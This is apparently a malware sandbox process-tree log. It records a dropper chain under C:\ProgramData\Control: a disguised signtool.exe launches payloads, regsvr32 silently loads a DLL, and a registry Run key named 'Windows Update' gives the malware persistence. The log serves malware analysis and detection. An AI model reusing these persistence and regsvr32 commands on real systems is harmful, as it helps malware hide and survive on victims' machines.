C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exeC:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exe C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\m.exe2⤵PID:9800
-
C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\m.exe"C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\m.exe"3⤵PID:9556
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s /i "C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msdriver64.dll"2⤵PID:9964
-
C:\Windows\system32\regsvr32.exe/s /i "C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msdriver64.dll"3⤵PID:10160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start /b /min reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /f /d "C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exe C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msvcruntime.exe"4⤵PID:9292
-
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /f /d "C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exe C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msvcruntime.exe"5⤵
- Modifies registry key
PID:4356
-
-
-
-
-
C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exeC:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\signtool.exe C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msvcruntime.exe2⤵PID:9956
-
C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msvcruntime.exe"C:\ProgramData\Control\99c4c1d7-472d-4af8-bc73-81bd11838b27\msvcruntime.exe"3⤵PID:8000
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10184
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9256
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9532
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9324
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9724
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:10200
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7036
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3336
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9620
-
C:\Users\Admin\AppData\Local\Temp\is-41S00.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-41S00.tmp\Setup3310.tmp" /SL5="$2085A,138429,56832,C:\Users\Admin\AppData\Local\Temp\iumpw3jvlej\Setup3310.exe" /Verysilent /subid=5771⤵PID:5008
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9640